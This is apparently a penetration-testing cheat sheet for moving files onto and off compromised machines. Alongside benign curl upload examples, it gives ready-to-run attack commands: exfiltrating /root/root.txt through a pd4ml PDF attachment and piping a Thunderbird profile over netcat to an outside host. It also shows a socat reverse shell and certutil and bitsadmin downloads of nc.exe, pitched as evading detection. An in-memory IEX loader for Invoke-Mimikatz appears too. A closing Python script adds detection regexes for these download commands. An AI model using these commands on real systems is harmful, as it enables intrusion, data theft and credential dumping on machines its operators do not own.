File Transfer
Listeners and binaries
curl
File Upload
curl -T example.txt https://example.com/upload
File Upload + POST
curl -T example.txt -X POST https://example.com/upload
File upload + Authentication
curl -u user:pass -T example.txt https://example.com/upload
File Upload + Token Authentication
curl -u :YOUR_TOKEN -T example.txt https://example.com/upload
File Upload + Custom Header
curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/upload
File Upload + Multiple Custom Headers
curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/upload
Multiple File Uploads
curl -T "{file1.txt,file2.txt}" https://example.com/upload
File Upload as Form submission
curl -F "file=@example.txt" https://example.com/upload
File Upload + Additional Query Parameters
curl -T example.txt "https://example.com/upload?user=alice&timestamp=2024"
File Upload + Redirect
curl -L -T example.txt https://example.com/upload
File Upload + Retry
curl --retry 5 -T example.txt https://example.com/upload
File Upload to FTP server
curl -T example.txt ftp://ftp.example.com/upload/
File Upload + Custom HTTP Method
curl -X PATCH -T example.txt https://example.com/upload
File transfer on compromised Apache servers
Copy a file into Apache Web Directory
With the right permissions, you can copy the file to /var/www/html so it can be accessed from the URL http://<server-ip>/file.txt.
cp archivo.txt /var/www/html
Give ownership to the web user
sudo chown www-data:www-data /var/www/html/archivo.txt
Set the file to be read by everyone
sudo chmod 644 /var/www/html/archivo.txt
Uploading via Apache (web interface)
Ensure the appropriate upload_max_filesize and post_max_size directives are set in the php.ini file. It is normally located here:
/etc/php/7.x/apache2/php.ini
upload_max_filesize = 50M
post_max_size = 50M
Use pd4ml.jar to exfiltrate files by attaching them to the PDF
POC
<html>
<pd4ml:attachment src="/root/root.txt"/>
</html>
With PHP code execution
One liner
php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
Secure Copy Protocol scp
From local machine to remote host
scp localfile username@remotehost:/path/to/destination/
From remote host to local machine
scp username@remotehost:/path/to/remotefile /local/path/
Specific Port
scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1
With key
scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/
From local to Apache Server
scp archivo.txt user@remote-server:/var/www/html/
Using Netcat
Host
nc -lvp <Local_PORT> > file
Client
nc <Target_IP> <port> < file
With cat
cat <file> | nc Target_IP 443
Use tar for directories
tar -cf - .thunderbird | nc 10.10.16.10 4445
Using Socat
Listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
Target Machine
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Windows
curl
curl http://ip/file -o <output>
wget
wget http://ip/file -OutFile <output>
certutil
First, start a python web server
python3 -m http.server 443
Then
certutil.exe -f -urlcache -split http://<IP>/<file>
Sneaky Version
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe
Invoke-WebRequest
First, start a python web-server
python3 -m http.server 443
Then
IWR -uri http://<ip>/<file> -OutFile <file_name>
Uses Chrome User Agent
Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"
Upload a file
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
Impacket
First, create an SMB share folder
impacket-smbserver <share_name> <file_path> -smb2support
Then, copy the files
copy \\<ip>\share\<file> <destination_path>
System.Net.WebClient
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')
Bitsadmin
Download files stealthily and evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
Modern Version
Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe
In-memory execution
Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')
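Detection
The Windows download commands above (certutil, bitsadmin, Start-BitsTransfer, Invoke-WebRequest, WebClient, IEX) leave distinctive process command lines. As an added example that is not part of the original page, this Python script flags them in process-creation events; the rule names, regexes and sample events are constructed for illustration.

```python
import re

# Command-line patterns for the Windows download techniques listed on this page.
# Rule names and regexes are constructed for this example, not a vendor ruleset.
RULES = {
    "certutil_download": re.compile(
        r"\bcertutil(\.exe)?\b.*[-/](urlcache|verifyctl)\b.*https?://", re.I),
    "bitsadmin_transfer": re.compile(
        r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I),
    "start_bitstransfer": re.compile(
        r"\bStart-BitsTransfer\b.*-Source\s+\S*https?://", re.I),
    "webclient_download": re.compile(
        r"Net\.WebClient\b.*\.Download(File|String)\s*\(", re.I),
    "iwr_outfile": re.compile(
        r"\b(Invoke-WebRequest|IWR|wget|curl)\b.*https?://.*-OutFile\b", re.I),
    "iex_download": re.compile(
        r"\b(IEX|Invoke-Expression)\b.*DownloadString", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (host, hits, cmdline) for each event that matches a rule."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, hits, cmdline))
    return findings

# Constructed process-creation events (host, command line); 192.0.2.10 is a
# documentation address, and the last two lines are benign admin usage.
SAMPLE_EVENTS = [
    ("ws01", r"certutil.exe -f -urlcache -split http://192.0.2.10/tool.exe"),
    ("ws01", r"certutil.exe -verifyctl -split -f http://192.0.2.10/tool.exe"),
    ("ws02", r"bitsadmin /transfer n http://192.0.2.10/tool.exe C:\Temp\tool.exe"),
    ("ws02", r"powershell.exe Start-BitsTransfer -Source http://192.0.2.10/tool.exe -Destination C:\Temp\tool.exe"),
    ("ws03", r"powershell.exe IWR -uri http://192.0.2.10/tool.exe -OutFile tool.exe"),
    ("ws03", r"powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://192.0.2.10/script.ps1')"),
    ("ws04", r"certutil.exe -hashfile C:\Temp\setup.exe SHA256"),
    ("ws04", r"bitsadmin /list /allusers"),
]

if __name__ == "__main__":
    for host, hits, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}  {','.join(hits)}  {cmdline}")
```

The two benign lines (certutil -hashfile, bitsadmin /list) produce no finding because each rule requires both the transfer switch and a URL.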